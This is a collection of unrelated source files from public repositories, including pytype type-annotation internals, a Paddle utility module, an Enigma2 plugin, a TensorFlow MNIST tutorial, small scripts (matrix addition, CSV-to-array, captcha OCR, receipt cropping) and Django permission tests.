    return node, new.to_variable(node)

  def instantiate(self, node, container=None):
    """Instantiate every option, with cycle detection via the instance cache."""
    var = self.ctx.program.NewVariable()
    for option in self.options:
      k = (node, _get_container_type_key(container), option)
      if k in self._instance_cache:
        # A None entry means instantiation of this option is already in
        # progress higher up the stack; break the cycle with Any.
        if self._instance_cache[k] is None:
          self._instance_cache[k] = self.ctx.new_unsolvable(node)
        instance = self._instance_cache[k]
      else:
        self._instance_cache[k] = None
        instance = option.instantiate(node, container)
        self._instance_cache[k] = instance
      var.PasteVariable(instance, node)
    return var

  def call(self, node, func, args, alias_map=None):
    # Calling a union calls every option.
    var = self.ctx.program.NewVariable(self.options, [], node)
    return function.call_function(self.ctx, node, var, args)

  def get_formal_type_parameter(self, t):
    new_options = [option.get_formal_type_parameter(t)
                   for option in self.options]
    return Union(new_options, self.ctx)

  def get_inner_types(self):
    return enumerate(self.options)

  def update_inner_type(self, key, typ):
    self.options[key] = typ

  def replace(self, inner_types):
    return self.__class__((v for _, v in sorted(inner_types)), self.ctx)
class LateAnnotation:
  """A late annotation.

  A late annotation stores a string expression and a snapshot of the VM stack at
  the point where the annotation was introduced. Once the expression is
  resolved, the annotation pretends to be the resolved type; before that, it
  pretends to be an unsolvable. This effect is achieved by delegating attribute
  lookup with __getattribute__.

  Note that for late annotation x, `isinstance(x, ...)` and `x.__class__` will
  use the type that x is pretending to be; `type(x)` will reveal x's true type.
  Use `x.is_late_annotation()` to check whether x is a late annotation.
  """

  # Sentinel stored in self.resolved while resolution is in progress: truthy,
  # but distinguishable from True.
  _RESOLVING = object()

  def __init__(self, expr, stack, ctx, *, typing_imports=None):
    self.expr = expr
    self.stack = stack
    self.ctx = ctx
    self.resolved = False
    # Any new typing imports the annotation needs while resolving.
    self._typing_imports = typing_imports or set()
    self._type = ctx.convert.unsolvable  # the resolved type of `expr`
    self._unresolved_instances = set()
    self._resolved_instances = {}
    # _attribute_names needs to be defined last! This contains the names of all
    # of LateAnnotation's attributes, discovered by looking at
    # LateAnnotation.__dict__ and self.__dict__. These names are used in
    # __getattribute__ and __setattr__ to determine whether a given get/setattr
    # call should operate on the LateAnnotation itself or its resolved type.
    self._attribute_names = (
        set(LateAnnotation.__dict__) |
        set(super().__getattribute__("__dict__")))

  def flatten_expr(self):
    """Flattens the expression into a legal variable name if necessary.

    Pytype stores parameterized recursive types in intermediate variables. If
    self is such a type, this method flattens self.expr into a string that can
    serve as a variable name. For example, 'MyRecursiveAlias[int, str]' is
    flattened into '_MyRecursiveAlias_LBAR_int_COMMA_str_RBAR'.

    Returns:
      If self is a parameterized recursive type, a flattened version of
      self.expr that is a legal variable name. Otherwise, self.expr unchanged.
    """
    if "[" in self.expr and self.is_recursive():
      # _DOT and _RBAR have no trailing underscore because they precede names
      # that we already prefix an underscore to.
      return "_" + self.expr.replace(".", "_DOT").replace(
          "[", "_LBAR_").replace("]", "_RBAR").replace(", ", "_COMMA_")
    return self.expr

  def unflatten_expr(self):
    """Unflattens a flattened expression."""
    if "_LBAR_" in self.expr:
      mod, dot, rest = self.expr.rpartition(".")
      # The [1:] slicing and trailing underscore in _DOT_ are to get rid of
      # leading underscores added when flattening.
      return mod + dot + rest[1:].replace("_DOT_", ".").replace(
          "_LBAR_", "[").replace("_RBAR", "]").replace("_COMMA_", ", ")
    return self.expr

  def __repr__(self):
    return "LateAnnotation({!r}, resolved={!r})".format(
        self.expr, self._type if self.resolved else None)

  # __hash__ and __eq__ need to be explicitly defined for Python to use them in
  # set/dict comparisons.
  def __hash__(self):
    return hash(self._type) if self.resolved else hash(self.expr)

  def __eq__(self, other):
    return hash(self) == hash(other)

  def __getattribute__(self, name):
    # We use super().__getattribute__ directly for attribute access to avoid a
    # performance penalty from this function recursively calling itself.
    get = super().__getattribute__
    if name == "_attribute_names" or name in get("_attribute_names"):
      return get(name)
    # Everything else is delegated to the resolved (or unsolvable) type.
    return get("_type").__getattribute__(name)  # pytype: disable=attribute-error

  def __setattr__(self, name, value):
    if not hasattr(self, "_attribute_names") or name in self._attribute_names:
      return super().__setattr__(name, value)
    return self._type.__setattr__(name, value)

  def resolve(self, node, f_globals, f_locals):
    """Resolve the late annotation."""
    if self.resolved:
      return
    # Sets resolved to a truthy value distinguishable from True so that
    # 'if self.resolved' is True when self is partially resolved, but code that
    # really needs to tell partially and fully resolved apart can do so.
    self.resolved = LateAnnotation._RESOLVING
    # Add implicit imports for typing, since we can have late annotations like
    # `set[int]` which get converted to `typing.Set[int]`.
    if self._typing_imports:
      overlay = self.ctx.vm.import_module("typing", "typing", 0)
      for v in self._typing_imports:
        if v not in f_globals.members:
          f_globals.members[v] = overlay.get_module(v).load_lazy_attribute(v)
    var, errorlog = abstract_utils.eval_expr(self.ctx, node, f_globals,
                                             f_locals, self.expr)
    if errorlog:
      self.ctx.errorlog.copy_from(errorlog.errors, self.stack)
    self._type = self.ctx.annotation_utils.extract_annotation(
        node, var, None, self.stack)
    if self._type != self.ctx.convert.unsolvable:
      # We may have tried to call __init__ on instances of this annotation.
      # Since the annotation was unresolved at the time, we need to call
      # __init__ again to define any instance attributes.
      for instance in self._unresolved_instances:
        if isinstance(instance.cls, Union):
          # Having instance.cls be a Union type will crash in attribute.py.
          # Setting it to Any picks up the annotation in another code path.
          instance.cls = self.ctx.convert.unsolvable
        else:
          self.ctx.vm.reinitialize_if_initialized(node, instance)
    self.resolved = True
    log.info("Resolved late annotation %r to %r", self.expr, self._type)

  def set_type(self, typ):
    # Used by annotation_utils.sub_one_annotation to substitute values into
    # recursive aliases.
    assert not self.resolved
    self.resolved = True
    self._type = typ

  def to_variable(self, node):
    if self.resolved:
      return self._type.to_variable(node)
    else:
      return _base.BaseValue.to_variable(self, node)  # pytype: disable=wrong-arg-types

  def instantiate(self, node, container=None):
    """Instantiate the pointed-to class, or record a placeholder instance."""
    if self.resolved:
      # Cache per (node, container) so repeated instantiation reuses values.
      key = (node, _get_container_type_key(container))
      if key not in self._resolved_instances:
        self._resolved_instances[key] = self._type.instantiate(node, container)
      return self._resolved_instances[key]
    else:
      # Remember the placeholder so resolve() can re-run __init__ on it.
      instance = _instance_base.Instance(self, self.ctx)
      self._unresolved_instances.add(instance)
      return instance.to_variable(node)

  def get_special_attribute(self, node, name, valself):
    if name == "__getitem__" and not self.resolved:
      container = _base.BaseValue.to_annotation_container(self)  # pytype: disable=wrong-arg-types
      return container.get_special_attribute(node, name, valself)
    return self._type.get_special_attribute(node, name, valself)

  def is_late_annotation(self):
    return True

  def is_recursive(self):
    """Check whether this is a recursive type."""
    if not self.resolved:
      return False
    # Iterative DFS over nested annotations, looking for a cycle back to a
    # late annotation we have already seen.
    seen = {id(self)}
    stack = [self._type]
    while stack:
      t = stack.pop()
      if t.is_late_annotation():
        if id(t) in seen:
          return True
        seen.add(id(t))
      if isinstance(t, mixin.NestedAnnotation):
        stack.extend(child for _, child in t.get_inner_types())
    return False
class FinalAnnotation(_base.BaseValue):
  """Container for a Final annotation."""

  def __init__(self, annotation, ctx):
    super().__init__("FinalAnnotation", ctx)
    # The type wrapped by typing.Final[...].
    self.annotation = annotation

  def __repr__(self):
    return f"Final[{self.annotation}]"

  def instantiate(self, node, container=None):
    return self.to_variable(node)
| google/pytype | pytype/abstract/_typing.py | _typing.py | py | 31,975 | python | en | code | 4,405 | github-code | 36 |
16152684320 | class ArrayOperations:
    def getArray(self):
        """Read a size x size matrix of integers from stdin and return it.

        Relies on the module-level global `size` being set before the call.
        """
        global size
        arr=[]
        for i in range(size):
            print("Enter array number ",i+1)
            temp=[]
            for j in range(size):
                # One interactive prompt per element.
                temp.append(int(input("Enter each element followed by the return key")))
            arr.append(temp)
        return arr
    def addArray(self,arr1,arr2):
        """Append the element-wise sum of arr1 and arr2 to the global `result`.

        NOTE(review): writes into the module-level `result` list instead of
        returning a value; `result` must be emptied before each call.
        """
        for i in range(size):
            global result
            resultTemp=[]
            for j in range(size):
                resultTemp.append(arr1[i][j]+arr2[i][j])
            result.append(resultTemp)
    def displayArray(self,res):
        """Print the matrix `res` row by row, elements space-separated."""
        global size
        for i in range(size):
            for x in res[i]:
                print(x,end=" ")
            print()
# Driver: read two size x size matrices, add them into the global `result`.
size=int(input("Enter the size of the array"))
obj=ArrayOperations()
arr1=obj.getArray()
arr2=obj.getArray()
result=[]
obj.addArray(arr1,arr2)
obj.displayArray(result) | siva5271/week3_assignments | q19.py | q19.py | py | 925 | python | en | code | 0 | github-code | 36 |
74330831463 | from Components.config import config
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Tools.Log import Log
from Tools.LoadPixmap import LoadPixmap
from Tools.Directories import resolveFilename, SCOPE_SKIN
class RemoteControlSelection(Screen):
    """Screen that lets the user pick which remote control model is in use.

    Cycles through four bundled remote images (rc0..rc3) with left/right and
    persists the chosen index to config.misc.rcused on OK.
    """
    SKIN_DEFAULT = "skin_default"
    skin = """
        <screen name="RemoteControlSelection" position="center,80" size="420,610" title="RemoteControlSelection" >
            <widget name="rc" pixmap="skin_default/rc0.png" position="20,10" size="380,500" alphatest="on"/>
            <widget name="color_hint" position="10,520" size="400,50" font="Regular;18" halign="center" valign="center" backgroundColor="background" transparent="0" />
            <widget name="ok" position="10,580" size="400,24" font="Regular;22" halign="center" valign="center" backgroundColor="background" transparent="0" />
        </screen>
    """
    def __init__(self, session):
        Screen.__init__(self, session)
        self["color_hint"] = Label(_("Some Remotes may exist in other Colors"))
        self["ok"] = Label(_("Press OK to apply"))
        self._pixmap = Pixmap()
        self["rc"] = self._pixmap
        self["actions"] = ActionMap(["DirectionActions", "OkCancelActions"],
        {
            "ok": self._ok,
            "cancel": self._cancel,
            "right": self._next,
            "left": self._prev,
        })
        # Preload the four remote images once; navigation only swaps pixmaps.
        self._pixmaps = []
        for i in (0, 1, 2, 3):
            self._pixmaps.append(
                LoadPixmap(
                    resolveFilename(SCOPE_SKIN, "skin_default/rc%s.png" % (i))
                )
            )
        self._index = -1
        self.onFirstExecBegin.append(self._firstExecBegin)
    def _firstExecBegin(self):
        # Defer title/pixmap setup until the screen is actually shown.
        self.setTitle(_("Select your Remote"))
        self.setCurrentPixmap(config.misc.rcused.value)
    def _ok(self):
        # Persist the currently shown remote model and close.
        config.misc.rcused.value = self._index
        config.misc.rcused.save()
        Log.i("RC is now set to Model %s" %(config.misc.rcused.value))
        self.close()
    def _cancel(self):
        self.close()
    def setCurrentPixmap(self, index):
        # Wrap around at both ends so navigation cycles through 0..3.
        if index > 3:
            index = 0
        if index < 0:
            index = 3
        self._index = index
        self._pixmap.setPixmap(self._pixmaps[index])
    def _next(self):
        self._pixmap.setShowHideAnimation("slide_right_to_left")
        self.setCurrentPixmap(self._index + 1)
    def _prev(self):
        self._pixmap.setShowHideAnimation("slide_left_to_right")
        self.setCurrentPixmap(self._index - 1)
def remoteControlSelectionRun(session, **kwargs):
    """Menu callback: open the remote control selection screen."""
    session.open(RemoteControlSelection)
def remoteControlSelectionMenu(menuid, **kwargs):
    """Contribute a menu entry, but only to the 'devices' menu."""
    if menuid != "devices":
        return []
    return [(_("Remote Control Selection"), remoteControlSelectionRun, "rcu_selection", None)]
def Plugins(**kwargs):
    """Enigma2 plugin entry point: register the menu hook."""
    return PluginDescriptor(name=_("Remote Control Selection"), description=_("Select the remote you're using"), where=PluginDescriptor.WHERE_MENU, needsRestart=False, fnc=remoteControlSelectionMenu)
| opendreambox/enigma2 | usr/lib/enigma2/python/Plugins/SystemPlugins/RemoteControlSelection/plugin.py | plugin.py | py | 2,851 | python | en | code | 1 | github-code | 36 |
4778562539 | from typing import Optional, Tuple, Union
import paddle
import paddle.nn.functional as F
def cast_if_needed(tensor: Union[paddle.Tensor, None],
                   dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
    """Cast tensor to dtype"""
    # No-op when tensor is None or already has the requested dtype.
    return tensor if tensor is None or tensor.dtype == dtype else paddle.cast(tensor, dtype)
def cast_if_needed_inplace(tensor: Union[paddle.Tensor, None],
                           dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
    """Cast tensor to dtype (inplace), not to be used on layer inputs"""
    # _to mutates the tensor's storage, hence the warning above.
    return tensor if tensor is None or tensor.dtype == dtype else tensor._to(dtype=dtype)
def check_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> bool:
    """For fp8 fprop (TN layout), inputs and weights must be such
    that dim0 is divisible by 8 and dim1 is divisible by 16.
    """
    dim0_ok = tensor.shape[0] % 8 == 0
    dim1_ok = tensor.shape[1] % 16 == 0
    return dim0_ok and dim1_ok
def assert_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> None:
    """For fp8 fprop (TN layout), inputs and weights must be such
    that dim0 is divisible by 8 and dim1 is divisible by 16.
    """
    # single tensor check so it's clear which tensor is triggering the assertion
    # NOTE(review): the message lists both dims even when only one fails.
    assert check_dim_for_fp8_forward_exec(tensor), (
        "Tensor dimensions are not compatible for FP8 execution: "
        f"({tensor.shape[0]} % 8 != 0, {tensor.shape[1]} % 16 != 0)")
def get_bias_dtype(activation_dtype: paddle.dtype):
    """Get bias dtype given activation_dtype"""
    # fp32 activations use bf16 biases; otherwise biases match activations.
    return paddle.bfloat16 if activation_dtype == paddle.float32 else activation_dtype
def get_paddle_act_func(activation):
    """Get paddle activation function.

    Args:
        activation: Name of the activation; one of 'gelu' or 'relu'.

    Returns:
        The paddle.nn.functional callable implementing the activation.

    Raises:
        ValueError: If the activation name is not supported.
    """
    funcs = {
        'gelu': F.gelu,
        'relu': F.relu,
    }
    if activation not in funcs:
        # `raise <str>` is a TypeError in Python 3 (exceptions must derive
        # from BaseException); raise a real exception with the same message.
        raise ValueError("Activation type " + activation + " is not supported.")
    return funcs[activation]
def attention_mask_func(attention_scores: paddle.Tensor,
                        attention_mask: paddle.Tensor) -> paddle.Tensor:
    """Get attention mask"""

    def _masked_fill(x, mask, value):
        # Emulates masked_fill with where(): take `value` where mask is True.
        y = paddle.full(x.shape, value, x.dtype)
        return paddle.where(mask, y, x)

    # Masked positions get a large negative logit so they vanish after softmax.
    attention_scores = _masked_fill(attention_scores, attention_mask, -10000.0)
    return attention_scores
def mask_to_cu_seqlens(mask: paddle.Tensor, need_kv: bool = False) -> paddle.Tensor:
    """Convert mask to cu_seqlens"""
    assert 'bool' in str(mask.dtype), "mask must be bool dtype"
    assert len(mask.shape) == 4 and mask.shape[1] == 1, "mask must be [b, 1, s_q, s_kv]"
    # Unmasked positions are False, so counting False entries gives each
    # sequence's actual length.
    q_actual_seqlens = paddle.sum(mask[:, :, :, 0] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
    q_cu_seqlens = paddle.cumsum(q_actual_seqlens)
    # Prepend 0 so cu_seqlens[i] is the start offset of sequence i.
    q_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), q_cu_seqlens], axis=0)
    if not need_kv:
        return q_cu_seqlens, None
    # Same computation along the kv axis.
    kv_actual_seqlens = paddle.sum(mask[:, :, 0, :] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
    kv_cu_seqlens = paddle.cumsum(kv_actual_seqlens)
    kv_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), kv_cu_seqlens], axis=0)
    return q_cu_seqlens, kv_cu_seqlens
def divide(numerator: int, denominator: int) -> int:
    """Ensure that numerator is divisible by the denominator and return
    the division value."""
    quotient, remainder = divmod(numerator, denominator)
    assert remainder == 0, f"{numerator} is not divisible by {denominator}"
    return quotient
def save_for_backward_allow_none(ctx, *args) -> None:
    """Save tensors for backward. Args could be None"""
    # For each positional arg, record its position in the saved-tensor list,
    # or -1 when the arg was None.
    indices_mapping = []
    tensors_to_save = []
    for x in args:
        if isinstance(x, paddle.Tensor):
            indices_mapping.append(len(tensors_to_save))
            tensors_to_save.append(x)
        elif x is None:
            indices_mapping.append(-1)
        else:
            raise ValueError(f"Type {type(x)} is not allowed.")

    ctx._indices_mapping = indices_mapping
    ctx.save_for_backward(*tensors_to_save)
def saved_tensor_allow_none(ctx) -> Tuple[Optional[paddle.Tensor]]:
    """Used with `save_for_backward_allow_none` in pair. Get saved tensors from ctx."""
    assert hasattr(ctx, '_indices_mapping'), "`saved_tensor_allow_none` must be used " \
        "with `save_for_backward_allow_none` in pair."
    indices_mapping = ctx._indices_mapping
    outputs = []

    saved_tensors = ctx.saved_tensor()
    for index in indices_mapping:
        if index < 0:
            # This slot held None at save time.
            outputs.append(None)
        else:
            outputs.append(saved_tensors[index])
    return tuple(outputs)
| NVIDIA/TransformerEngine | transformer_engine/paddle/utils.py | utils.py | py | 4,609 | python | en | code | 1,056 | github-code | 36 |
27890676766 | # -*- coding: utf-8 -*-
import tensorflow as tf
import tensorflow.examples.tutorials.mnist.input_data as input_data
import pdb
def weight_variable(shape):
    "Initialize a weight tensor from a truncated normal (stddev=0.1)."
    initial = tf.truncated_normal(shape,stddev=0.1)
    return tf.Variable(initial)
def bias_variable(shape):
    "Initialize a bias tensor to the constant 0.1."
    initial = tf.constant(.1,shape=shape)
    return tf.Variable(initial)
def conv2d(x,W):
    "2-D convolution with stride 1 and SAME (zero) padding."
    return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding="SAME")
def max_pool_2x2(x):
    "2x2 max pooling with stride 2 and SAME padding."
    return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding="SAME")
if __name__ == "__main__":
x = tf.placeholder("float", shape=[None, 784])
y_ = tf.placeholder("float", shape=[None, 10])
mnist = input_data.read_data_sets("MNIST_data",one_hot=True)
sess = tf.InteractiveSession()
# create CNN
W_conv1 = weight_variable([5,5,1,32]) # 32个卷积核
b_conv1 = bias_variable([32])
x_image = tf.reshape(x,[-1,28,28,1])
h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1)+b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5,5,32,64]) # 64个卷积核
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2)+b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7*7*64,1024]) # 图片尺寸减小为 7x7, 输入channel为 64,输入总数为 7x7x64???? 前面的padding 用的same, 这里图片大小应该还是28x28??
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1)+b_fc1)
keep_prob = tf.placeholder("float")
h_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2)+b_fc2)
cross_entropy = -tf.reduce_sum(y_*tf.log(y_conv))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1),tf.argmax(y_,1))
accuarcy = tf.reduce_mean(tf.cast(correct_prediction,"float"))
sess.run(tf.initialize_all_variables())
for i in range(500):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuarcy.eval(feed_dict={x:batch[0],y_:batch[1],keep_prob:1.0})
print("step %d, trainning accuarcy %g"%(i,train_accuracy))
train_step.run(feed_dict={x:batch[0],y_:batch[1],keep_prob:0.5})
print("test accuarcy %g"%accuarcy.eval(feed_dict={
x:mnist.test.images,y_:mnist.test.labels,keep_prob:1.0}))
pdb.set_trace()
| RyanWangZf/Tensorflow_Tutorial | Others/simple_CNN.py | simple_CNN.py | py | 2,840 | python | en | code | 0 | github-code | 36 |
71930911465 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 20:17:37 2017
@author: afranio
"""
import numpy as np
import matplotlib.pyplot as plt
# Experimental data:
# benzene - vapor pressure vs. temperature
P = np.array([ 1, 5, 10, 20, 40, 60, 100, 200, 400, 760]) # mmHg
T = np.array([-36.7, -19.6, -11.5, -2.6, 7.6, 15.4, 26.1, 42.2, 60.6, 80.1]) # C

# degree of the polynomial to fit
n = 4

# fit the polynomial (coefficients in descending powers)
c = np.polyfit(T,P,n)

# evaluate the fit at the experimental temperatures (to compare with data)
z = np.polyval(c,T)

# "continuous" temperature domain for plotting the fitted curve
Tc = np.arange(-37,81.1,0.1)

# np.polyval replaces the previous hand-expanded degree-4 polynomial, so the
# plot stays correct if the degree `n` above is ever changed.
plt.plot(Tc,np.polyval(c,Tc),'-',T,P,'*')
plt.title('Pressao de vapor benzeno - ajustada com polinomio de quarto grau')
plt.xlabel('T (C)')
plt.ylabel('P (mm Hg)')
| afraniomelo/curso-matlab | codigos/python/ajuste_polinomio.py | ajuste_polinomio.py | py | 887 | python | pt | code | 0 | github-code | 36 |
1408640826 | import sys
import csv
# Command-line arguments describing how to interpret the CSV.
csv_file_name = sys.argv[1] # Name of the file to parse
column_table_index = sys.argv[2] # The column which should be used as an index
column_table_index_base = int(sys.argv[3]) # The base of that column (i.e. base 16, base 10, base 2) expressed in base 10
column_table_value = sys.argv[4] # The column which should be used as a value
delimiter_ascii = str(chr(int(sys.argv[5]))) # The delimiter between each column
table_entry_count = int(sys.argv[6]) # Base 10 length of the array aligned to the nearest power of 2
value_data_type = str(sys.argv[7]) # The type of the array "int", "string", etc...

with open(csv_file_name, newline='') as csv_file:
    spam_reader = csv.reader(csv_file, delimiter=delimiter_ascii)

    # Find the index/value columns in the header row, then break so the
    # data loop below resumes at the first data row.
    idx_col_index = 0
    idx_col_value = 0
    for row in spam_reader:
        idx_col_index = row.index(column_table_index)
        idx_col_value = row.index(column_table_value)
        break

    row_count = 0
    a_table = [0] * table_entry_count

    print(column_table_index,":",column_table_value)

    # Fill the table: the index column (parsed in the given base) selects the
    # slot, the value column supplies the contents.
    for row in spam_reader:
        a_table[int(row[idx_col_index], base=column_table_index_base)] = row[idx_col_value]
        print(row[idx_col_index],":",row[idx_col_value])
        row_count += 1

    print(row_count,"rows")

    # Emit the table as C source. NOTE(review): only the "int" data type is
    # handled; other value_data_type values silently produce no array.
    if (value_data_type == "int"):
        print("int array[] = { ")

        array_str = ""
        for i in range(table_entry_count):
            array_str += str(a_table[i])
            array_str += ','

            if (i != table_entry_count - 1):
                array_str += ' '

        print(array_str)
        print("};")
| awewsomegamer/PyotorComputer | tools/csv2array.py | csv2array.py | py | 1,855 | python | en | code | 2 | github-code | 36 |
70631449384 | from unittest import TestCase
from set_matrix_zeroes import Solution
class TestSolution(TestCase):
    def test_set_zeroes(self):
        """setZeroes must zero out every row/column containing a 0, in place."""
        cases = [
            ([[1, 1, 1], [1, 0, 1], [1, 1, 1]],
             [[1, 0, 1], [0, 0, 0], [1, 0, 1]]),
            ([[0, 1, 2, 0], [3, 4, 5, 2], [1, 3, 1, 5]],
             [[0, 0, 0, 0], [0, 4, 5, 0], [0, 3, 1, 0]]),
        ]
        for matrix, expected in cases:
            Solution().setZeroes(matrix)
            self.assertEqual(expected, matrix)
| sswest/leetcode | 73_set_matrix_zeroes/test_set_matrix_zeroes.py | test_set_matrix_zeroes.py | py | 512 | python | en | code | 0 | github-code | 36 |
12526381398 | from PIL import ImageGrab,Image
import pytesseract
def yz_code():
    """Load a captcha image from disk, clean and binarize it, then OCR it."""
    # Screen-grab variant (disabled): capture the captcha region directly.
    # bbox = (1348, 423, 1455, 455)  # capture region; depends on where the captcha sits on screen
    # img = ImageGrab.grab(bbox=bbox)
    # img.save("D:\\py\\login\\image_code.jpg")  # save path
    # img.show()
    img = Image.open('img5.bmp') # load the image with PIL
    # print img.format, img.size, img.mode  # print image info
    img = img.convert('RGBA') # convert to RGBA
    pix = img.load() # access pixel data
    for x in range(img.size[0]): # whiten the top and bottom black borders
        pix[x, 0] = pix[x, img.size[1] - 1] = (255, 255, 255, 255)
    for y in range(img.size[1]): # whiten the left and right black borders
        pix[0, y] = pix[img.size[0] - 1, y] = (255, 255, 255, 255)
    for y in range(img.size[1]): # binarize with threshold R=95, G=95, B=95
        for x in range(img.size[0]):
            if pix[x, y][0] < 95 or pix[x, y][1] < 95 or pix[x, y][2] < 95:
                pix[x, y] = (0, 0, 0, 255)
            else:
                pix[x, y] = (255, 255, 255, 255)
    img.save("img5.png") # tesseract needs the image on disk here
    image_temp = Image.open('img5.png')
    signin_code = pytesseract.image_to_string(image_temp,lang='eng')
    print(signin_code)


yz_code()
| SuneastChen/other_python_demo | 其他实例/验证码识别/图片处理1_pytesseract识别.py | 图片处理1_pytesseract识别.py | py | 1,285 | python | en | code | 0 | github-code | 36 |
26498800829 | import requests
import json
import numpy as np
import cv2
import os
from tqdm import tqdm
def crop_receipt(raw_img):
    """Crop receipt from a raw image captured by phone

    Args:
        raw_img ([np.array]): Raw image containing receipt

    Returns:
        cropped_receipt ([np.array]): The image of cropped receipt
    """
    # Remote services: one detects the receipt bounding box, the other
    # predicts a 90-degree rotation correction.
    CROP_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_detect'
    ROTATE_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/'
    _, img_encoded = cv2.imencode('.jpg', raw_img)
    detect_receipt = requests.post(CROP_RECEIPT_URL, files={"file": (
        "filename", img_encoded.tostring(), "image/jpeg")}).json()
    receipt_box = detect_receipt['receipt']
    if receipt_box is not None:
        # Box layout is [x1, y1, x2, y2] in image coordinates.
        crop = raw_img[receipt_box[1]:receipt_box[3], receipt_box[0]:receipt_box[2]]
        img_crop_request = cv2.imencode('.jpg', crop)[1]
        files = [
            ('img', img_crop_request.tostring())
        ]
        # NOTE(review): ROTATE_RECEIPT_URL is defined above but the URL is
        # repeated literally here; keep the two in sync.
        rotated_func = requests.request("POST", "http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/", files=files).text
        rotated_func = rotated_func.split('\n')
        # Response looks like "<rotation name>\n<confidence>"; only rotate
        # when the model is reasonably confident.
        if rotated_func[0] != 'None' and float(rotated_func[1]) > 0.6:
            dic_rotate_fuc = {'ROTATE_90_CLOCKWISE':cv2.ROTATE_90_CLOCKWISE, 'ROTATE_90_COUNTERCLOCKWISE':cv2.ROTATE_90_COUNTERCLOCKWISE, 'ROTATE_180':cv2.ROTATE_180}
            crop = cv2.rotate(crop, dic_rotate_fuc[rotated_func[0]])
        return crop
return raw_img | tiendv/MCOCR2021 | Task1/cropper.py | cropper.py | py | 1,516 | python | en | code | 9 | github-code | 36 |
73060543145 | from tutelary.models import (
PermissionSet, Policy, PolicyInstance
)
from django.contrib.auth.models import User
import pytest
from .factories import UserFactory, PolicyFactory
from .datadir import datadir # noqa
from .settings import DEBUG
@pytest.fixture(scope="function") # noqa
def setup(datadir, db):
    """Create three users with increasingly broad policy assignments.

    user1: default policy only; user2: + org policy (Cadasta);
    user3: + project policy (Cadasta/TestProj).
    """
    user1 = UserFactory.create(username='user1')
    user2 = UserFactory.create(username='user2')
    user3 = UserFactory.create(username='user3')
    PolicyFactory.set_directory(str(datadir))
    def_pol = PolicyFactory.create(name='def', file='default-policy.json')
    org_pol = PolicyFactory.create(name='org', file='org-policy.json')
    prj_pol = PolicyFactory.create(name='prj', file='project-policy.json')
    user1.assign_policies(def_pol)
    user2.assign_policies(def_pol,
                          (org_pol, {'organisation': 'Cadasta'}))
    user3.assign_policies(def_pol,
                          (org_pol, {'organisation': 'Cadasta'}),
                          (prj_pol, {'organisation': 'Cadasta',
                                     'project': 'TestProj'}))
    return (user1, user2, user3, def_pol, org_pol, prj_pol)
@pytest.fixture(scope="function") # noqa
def debug(db):
    """Return a state-dumping print function; a no-op unless DEBUG is set."""
    def fn(s):
        # Dump all permission sets and policy instances for inspection.
        print(s)
        psets = PermissionSet.objects.all()
        print('PSets:', list(map(
            lambda pset: str(pset.pk) + ': ' + repr(pset.tree()),
            psets)
        ))
        pis = PolicyInstance.objects.all()
        print('PolInsts:', list(map(lambda pi:
                                    str(pi.pk) + ': ' + str(pi.pset.id) + ' ' +
                                    pi.policy.name + ' ' +
                                    str(pi.variables), pis)))

    def nofn(s):
        pass

    if DEBUG:
        return fn
    else:
        return nofn
def check(nuser=None, npol=None, npolin=None, npset=None):
    """Assert database row counts; a None argument skips that check."""
    if nuser is not None:
        assert User.objects.count() == nuser
    if npol is not None:
        assert Policy.objects.count() == npol
    if npolin is not None:
        assert PolicyInstance.objects.count() == npolin
    if npset is not None:
        assert PermissionSet.objects.count() == npset
@pytest.mark.django_db # noqa
def test_permission_set_creation(datadir, setup, debug):
    """Three users over three policies yield three distinct permission sets."""
    user1, user2, user3, def_pol, org_pol, prj_pol = setup
    debug('CREATION')
    check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_change(datadir, setup, debug):
    """Re-assigning with different variables keeps the overall counts stable."""
    user1, user2, user3, def_pol, org_pol, prj_pol = setup
    debug('BEFORE')
    user2.assign_policies(def_pol,
                          (org_pol, {'organisation': 'DummyCorp'}))
    debug('AFTER')
    check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_clear_all(datadir, setup, debug):
    """Clearing all users' policies leaves only the shared empty pset."""
    user1, user2, user3, def_pol, org_pol, prj_pol = setup
    debug('BEFORE')
    user1.assign_policies()
    user2.assign_policies()
    user3.assign_policies()
    debug('AFTER')
    # Remember the empty permission set!
    check(nuser=3, npol=3, npolin=0, npset=1)
@pytest.mark.django_db # noqa
def test_permission_set_clear_single(datadir, setup, debug):
    """Clearing one user drops only that user's policy instance."""
    user1, user2, user3, def_pol, org_pol, prj_pol = setup
    debug('BEFORE')
    user1.assign_policies()
    debug('AFTER')
    # Remember the empty permission set!
    check(nuser=3, npol=3, npolin=5, npset=3)
